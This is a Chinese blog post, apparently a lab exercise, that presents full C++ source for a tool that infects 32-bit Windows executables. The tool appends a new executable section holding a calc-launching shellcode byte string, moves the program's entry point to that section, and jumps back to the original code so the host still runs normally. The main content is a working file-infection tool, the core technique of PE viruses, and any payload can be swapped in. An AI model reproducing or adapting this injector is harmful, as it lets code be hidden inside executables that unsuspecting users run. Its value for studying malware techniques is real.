PE文件注入

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量951 收藏 2
点赞数 1
分类专栏: C++ 汇编语言 PE 文章标签: PE文件注入 弹出计算器 shellcode win10 PE文件注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zha_ojunchen/article/details/105522567
版权
C++ 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
汇编语言
2 篇文章 0 订阅
订阅专栏
PE
1 篇文章 0 订阅
订阅专栏

PE文件注入shellcode、实现弹出计算器

1.实验环境及要求

win10(地址随机化)、 32位exe(dll尚未尝试、理论上是可行的)

实现功能

  1. 地址自定位的弹出计算器的shellcode
  2. 注入PE、打开PE是弹出计算器
  3. PE本身功能完整性

2. 实验思路

  1. 解决shellcode地址定位的问题(使用PEB解决)
  2. 修好PE节表、添加新的节
  3. 修改新节的内容、新节的首部注入shellcode
  4. 修改PE入口点、执行新节的起始地址(shellcode)
  5. 在新节的起始地址、添加JMP 指令、跳转带程序原来的入口地址、需要一些辅助的寻找原来的入口点在内存进程中的位置!

3. 程序执行

  1. 32位或者64位编译程序(hack.exe)
  2. hack.exe target.exe
  3. 输出注入了PE的target_back.exe

源代码:

#include <iostream>
#include<windows.h>
#include<winnt.h>
//PE文件结构 :https://blog.csdn.net/chkylin/article/details/47949029
#include <string>
#include <fstream>
#include <vector>

using namespace std;
typedef unsigned char u8;
char shellcode_x32[] = "\x31\xD2\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x3B\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x42\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7";

/**
 * debug __LINE__ 出现错误的行号
 * */
void error(string msg, int line = 0) {
    if (line != 0) {
        cout << "LINE " << line << " ERROR:" << msg << endl;
    } else {
        cout << "ERROR:" << msg << endl;
    }
}

/** 输入指针 输入大小
 *  输出指针内容的byte!
 *  */
void show(void *src, int size) {
    char *p = (char *) src;
    for (int i = 0; i < size; i++) {
        if (i % 16 == 0) {
            cout << endl;
        }
        printf("%02x ", (unsigned char) *p);
        p++;
    }
}

/**
 * char*指针转化为16位数无符号数
 * */
static UINT16 uint8to16(UINT8 twouint8[2]) {
    return *(UINT16 *) twouint8;
}

static UINT32 uint8to32(UINT8 fouruint8[4]) {
    return *(UINT32 *) fouruint8;
}

static UINT64 uint8to64(UINT8 eightuint8[8]) {
    return *(UINT64 *) eightuint8;
}

/**
 * 分割字符串 结果输出到string vector
 * */
static vector<string> split(const string &str, const string &pattern) {
    vector<string> res;
    if (str == "")
        return res;
    //在字符串末尾也加入分隔符,方便截取最后一段
    string strs = str + pattern;
    size_t pos = strs.find(pattern);
    while (pos != strs.npos) {
        string temp = strs.substr(0, pos);
        res.push_back(temp);
        //去掉已分割的字符串,在剩下的字符串中进行分割
        strs = strs.substr(pos + 1, strs.size());
        pos = strs.find(pattern);
    }
    return res;
}

/** 添加新节的步骤
 * 1. 获取节的数目,并且将节的数目加一
 * 2. 添加一个新的节表头、设置节表的属性
 * 3. 根据新加的节表头的VA地址、设置程序的入口点
 * 4. 新增节表(文件末尾) 添加注入的shellcode
 * 5. 在shellcode后面添加jmp指令、转到原始入口点
 * */
int main(int argc, char *argv[]) {
    setbuf(stdout, nullptr);
    if (argc != 2) {
        cout << "请输入命令行参数\n inject.exe(本程序) target.exe(待感染的程序)\n";
        exit(-1);
    }
    string target = argv[1];
    ifstream f(target, ios::in | ios::binary);
    if (!f) {
        error("文件打开失败", __LINE__);
        exit(-1);
    }
    f.seekg(0, f.end);
    size_t fileSize = f.tellg();
    f.seekg(0, f.beg);// 定位到文件开始
    u8 *buffer = new u8[fileSize + 0x200];
    memset(buffer, 0, fileSize + 0x200);
    f.read((char *) buffer, fileSize);
    f.close();
    cout << "File length is " << fileSize << endl;
    // PE+0x40
    //NT文件头 第三部分起始地址位于:DOS头的0x3c处 四字节
    PIMAGE_NT_HEADERS32 pimageNtHeaders32;
    pimageNtHeaders32 = (PIMAGE_NT_HEADERS32) (buffer + uint8to32(buffer + 0x3c));
    cout << "展示NT文件头\n";
    show(pimageNtHeaders32, sizeof(IMAGE_NT_HEADERS32));
    WORD NumberOfSections = pimageNtHeaders32->FileHeader.NumberOfSections;
    cout << "\n节表数" << NumberOfSections << endl;
    // TODO 节表数
    pimageNtHeaders32->FileHeader.NumberOfSections += 1;

    DWORD AddressOfEntryPoint = pimageNtHeaders32->OptionalHeader.AddressOfEntryPoint;
    cout << "原始入口" << hex << AddressOfEntryPoint << endl;
    WORD optionHeaderSize = pimageNtHeaders32->FileHeader.SizeOfOptionalHeader;
    // 单个节表的大小为0x28
    PIMAGE_SECTION_HEADER pimageSectionHeader = (PIMAGE_SECTION_HEADER) (((u8 *) pimageNtHeaders32) + 0x18 +
                                                                         optionHeaderSize);
    cout << "NT Header size is " << hex << 0x18 + optionHeaderSize << endl;
    cout << "展示节表\n";
    show(pimageSectionHeader, 20);
    PIMAGE_SECTION_HEADER p = pimageSectionHeader + NumberOfSections - 1;
    //show(p, 0x28);
    // 新的程序入口点
    DWORD lastSectionSizeInMem;

    if (p->SizeOfRawData % 0x1000 == 0) {
        lastSectionSizeInMem = p->SizeOfRawData;
    } else {
        lastSectionSizeInMem = ((p->SizeOfRawData / 0x1000) + 1) * 0x1000;
    }
    // 程序入口点
    DWORD NewAddressOfEntryPoint = p->VirtualAddress + lastSectionSizeInMem;
    pimageNtHeaders32->OptionalHeader.AddressOfEntryPoint = NewAddressOfEntryPoint;
    // shellcode在文件的偏移(最后一个节的文件起始地址+文件大小)恰好等于文件原始大小
    // 这个地址就是新节的在文件的起始地址!
    DWORD shellcodeInjectAddress = p->SizeOfRawData + p->PointerToRawData;
    cout << hex << shellcodeInjectAddress << endl;
    p++;// 执行demo节表
    // 节表:https://www.cnblogs.com/zpchcbd/p/12321986.html
    // 设置新节的属性
    memset(p->Name, 0, 8);
    strncpy((char *) p->Name, ".zjc", strlen(".zjc"));
    p->Misc.VirtualSize = 0x200;
    p->VirtualAddress = NewAddressOfEntryPoint;
    p->SizeOfRawData = 0x200;
    p->PointerToRawData = shellcodeInjectAddress;
    p->Characteristics = 0xE00000E0;// 可读可写可执行
    pimageNtHeaders32->OptionalHeader.SizeOfImage = NewAddressOfEntryPoint + p->Misc.VirtualSize;
    cout << dec << strlen(shellcode_x32);
    u8 *shell = buffer + shellcodeInjectAddress;
    //show(shell, 100);
    u8 *q = shell;// q为了方便测试
    int len = strlen(shellcode_x32);
    memcpy(shell, shellcode_x32, len);
    shell = shell + len;
    // shell 指向后续的JMP内容
    // \xE8\x00\x00\x00\x00\x58\x83\xE8\x4A\x2D\x00\x30\x02\x00\x05\xC0\x13\x01\x00\xFF\xE0
    // call 0x00000000; pop eax;
    // 防止字符串被截断
    memcpy(shell, "\xE8\x00\x00\x00\x00\x58", 6);
    shell += 6;
    //sub eax,0x4d [strlen(shellcode)+5]
    u8 subeax0x4d[] = "\x83\xE8\x4D";
    subeax0x4d[2] = (u8) (strlen(shellcode_x32) + 5);
    memcpy(shell, subeax0x4d, 3);
    shell += 3;
    //sub eax,0x00023000;//
    //add eax,0x000113C0;//
    //jmp eax;FFE0
    u8 *jmp = new u8[12];
    memcpy(jmp, "\x2D\x00\x30\x02\x00\x05\xC0\x13\x01\x00\xFF\xE0", 12);
    memcpy(jmp + 1, &NewAddressOfEntryPoint, 4);
    memcpy(jmp + 6, &AddressOfEntryPoint, 4);
    memcpy(shell, jmp, 12);
    delete[]jmp;

    show(shell, 12);
    show(q, 100);

    vector<string> outputTarget = split(target, ".");
    if (outputTarget.size() != 2) {
        error("格式错误\n", __LINE__);
        exit(-1);
    }
    string output = outputTarget[0] + "_bake.exe";
    // 注意是二进制打开 否则会出错误
    ofstream out(output, ios::binary | ios::trunc);
    if (!out) {
        error("写文件打开失败\n");
        exit(-1);
    }
    out.write((char *) buffer, fileSize + 0x200);
    out.close();
    delete[]buffer;
    return 0;
}

关于shellcode编写请参考:

https://github.com/zhaojunchen/win-exec-calc-shellcode

zha_ojunchen
关注
专栏目录
PEfile_infection:Windows 32位PE文件注入
02-16
在IT安全领域,PE文件注入是一种常见的恶意软件技术,主要用于32位Windows系统。PE(Portable Executable)文件是Windows操作系统中的可执行文件格式,包括.exe和.dll等。PE文件注入涉及修改原始PE文件的内存映像,...
尝试用studyPE和x32dbg修改.exe文件01
qq_40793198的博客
07-15 1060
标题尝试用studyPE和x32dbg修改.exe文件01 首先,准备一个exe文件,这里我使用自己用c++编写的exe文件,在程序中调用了LoadLibraryA函数动态加载dll文件,并使用GetProcAddress函数查询dll文件中的函数。采用这样的动态加载是为了简化试验过程,通常情况下,由于程序启动时会有地址重定位,因此,修改非动态加载的地址会比较繁琐。下面是程序,编译后生成的程序就是我们的试验目标exe程序: 下面,启动x32dbg.exe,并点文件->打开,打开上面生成的exe文件
Windows C++ 程序的入口点
iBliBiliBelieve的博客
11-01 1万+
第一个问题,什么是入口点? 对于开发者来说,程序的入口点就是程序执行的时候第一个执行的函数。 对于C++程序,常见的入口点有: 1.main 2.WinMain 3.DllMain 对于操作系统来说,程序的入口点就是把程序装载到内存后,第一条命令开始的地方。 操作系统(Windows)如何确定入口点呢? 首先,Windows下所有可执行程序都是PE格式,PE其中一个组成部分 可选头,...
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1048
就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
PE结构学习笔记--关于AddressOfEntryPoint位置在文件中怎么确定问题
cogbee的专栏
03-01 6324
第一次学习PE结构,也不知道有没有更好的办法。 1、AddressOfEntryPoint 这个成员在OptionalHeader里面,OptionalHeader的类型是一个IMAGE_OPTIONAL_HEADER32结构。该结构总共有31个成员,占的大小为224字节。成员7就是AddressOfEntryPoint。AddressOfEntryPoint占4个字节。它表示的是代码入口的R
手工解析PE(文件注入)
GNAIXGNAHZ的博客
06-05 1253
手工解析PE(文件注入)
上传文件注入(附一句话木马)
m0_50818626的博客
05-27 952
发现order by 6的时候还是正常的,当order by 7 的时候却出现问题了,判断字段数有6个。跟上'之后 没有输出了,而跟上 -- qwe 将后面注释掉以后又恢复正常了,判断此处为注入点。这里的URL地址就是咱们上传的一句话木马php文件的地址,密码就是我们POST上传的参数。>就是我们上传的一句话木马啦。如上图所示,有很明显的传参地点,我们选择在id=13后面跟一个'判断是否有注入点。到我们最关键的一步了,我们在输出位上跟上以下语句。我们就可以对对方的数据库为所欲为啦。四、上传一句话木马。
PE文件本地DLL注入工具
10-26
工具是通过修改PE文件的OEP位置,让它指向我们插入的代码(调用LoadLibrary函数),从而载入DLL进行程序注入,载入DLL后系统会自动调用DllMain函数,由于修改了OEP,使得我们的代码执行在被注入程序之前,且在同一...
易语言PE插件注入
07-21
PE插件注入中,我们需要理解PE文件结构,包括节区、导入表、导出表等关键部分,以便正确地将插件代码注入到目标进程中。 PE插件注入的基本步骤如下: 1. **目标进程选择**:确定要注入的进程,通常通过进程ID或...
PE文件注入 PE文件详解
02-28
这篇文章是关于PE文件注入技术的; 文章不但详细讲解了PE文件的结构; 而且讲述了如何在PE文件中进行注入代码的技术;
PE插件注入.rar
04-05
PE插件注入是一种在Windows操作系统环境下,通过将代码插入到另一个正在运行的进程(通常是可执行文件,即Portable Executable, PE文件)中,来实现功能扩展或恶意行为的技术。这种技术广泛应用于软件开发、系统调试...
PE文件静态注入
蚁景网安学院
02-08 1108
点击"蓝字"关注,获取更多技术内容DLL注入指的是向运行中的其他进程强制插入特定的DLL文件。可以通过修改静态的PE文件,修改输入表结构,使得程序执行时载入特定的DLL文件。通常可执行文件...
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2701
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
PE代码注入
windows小菜鸡的博客
08-15 1412
PE文件入口地址EntryPoint指向了PE文件开始执行的位置,关于PE文件的具体格式,大家可以自行百度。 本代码主要实现了在32位可执行程序中注入了一个弹窗 。其主要原理是修改EntryPoint地址处的内容,指向自己代码的地方,然后执行完毕后,再跳转到原入口的地址。 其中值得注意的几点: (1)需要关闭PE的地址随机化功能,可以通过修改OptionHeader头中的DllCharacteristics = 0x8100,来绕过地址随机化。 (2)计算E8和E9的时候,CALL 偏移:跳转地址 = 当前
PE头之IMAGE_OPTIONAL_HEADER解析
ChuMeng1999的博客
10-17 1896
目录预备知识一、相关实验二、C32Asm三、LordPE实验目的实验环境实验步骤一实验步骤二1.基地址与入口地址的查看2.子系统查看3.SizeOfImage验证实验步骤三 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《IMAGE_DOS_HEADER解析》、《PE头之IMAGE_FILE_HEADER解析》。 二、C32Asm C32Asm是一款国产的16进制编辑器,可以十分方便的对二进制文件进行各种编辑操作,同时支持反汇编操作。 本系列实验主要使用C32Asm作为编辑器,同类的编辑工具还有W
Shellter实操——exe文件注入
渗透测试
08-03 1778
Shellter实操 shellter主要功能为入侵PE文件(exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用 安装shellter apt-get install shellter 安装完成后,提示符输入shellter打开 成功打开后会出现一个 这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A 这一步是提供pe目标文件,下面是我自己导入的一个exe文件 大概过个一分钟(或更短)就会提示成功 接下来提示是否选择隐
驱动开发:内核运用LoadImage屏蔽驱动
热门推荐
CSDN
10-26 1万+
强制返回的方法意外,屏蔽驱动加载还可以使用另一种方式实现禁用模块加载,例如当驱动被加载首先回调函数内可以接收到,当接收到以后直接调用。我们看下驱动加载器,提示的信息是拒绝访问,因为这个驱动其实是加载了的,只是入口处被填充了返回而已。加载这段驱动程序,当有DLL文件加载后,则会强制弹出,从而实现屏蔽模块加载的作用。无法实现参数控制,而如果我们想要控制特定驱动的加载则需要自己做一些事情来实现,如下。节点,该节点里面就是被加载驱动入口,通过汇编在驱动头部写入。返回指令,即可实现屏蔽加载特定驱动文件
易语言PE永久注入
511遇见
05-28 7010
易语言PE永久注入是指把我们的DLL注入进程后生成一个新的EXE.当我们每次创建这个进程时,都会加载我们注入DLL,所以称之为永久注入,还有在易语言里实现PE永久注入,需要PEload,我们以资的形式加载到易语言。 易语言PE永久注入码: .版本 2 .局部变量 字节集, 字节集 .局部变量 DLL, 字节集 .局部变量 映像基址, 整数型 .局部变量 映像大小, 整数型 .局部变量 区段, 区段信息 .如果 (编辑框1.内容 ≠ “” 且 编辑框2.内容 ≠ “”) 字节集..
EXE进程注入EXE研究
gameWYD的专栏
10-15 4683
用EXE比较复杂,主要是进程间的虚拟地址是重叠的,注入代码不能覆盖目标进程的代码,所以只能注入到与原本不同的虚拟地址上,这样所有直接寻址的指令都会出错,要避免使用直接寻址或者用代码修正使用直接寻址的指令。避免直接寻址的做法是:要注入的代码中,不要使用全局变量、静态变量、字符串常量
PE文件格式详解:从MZ到PE的演变
在病毒分析中,理解PE文件格式非常重要,因为病毒经常利用PE文件的特性来隐藏自身、注入到其他程序或自我复制。例如,病毒可能会在文件中添加新的节来存放恶意代码,或者修改PE头中的入口点地址,使得程序在启动时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值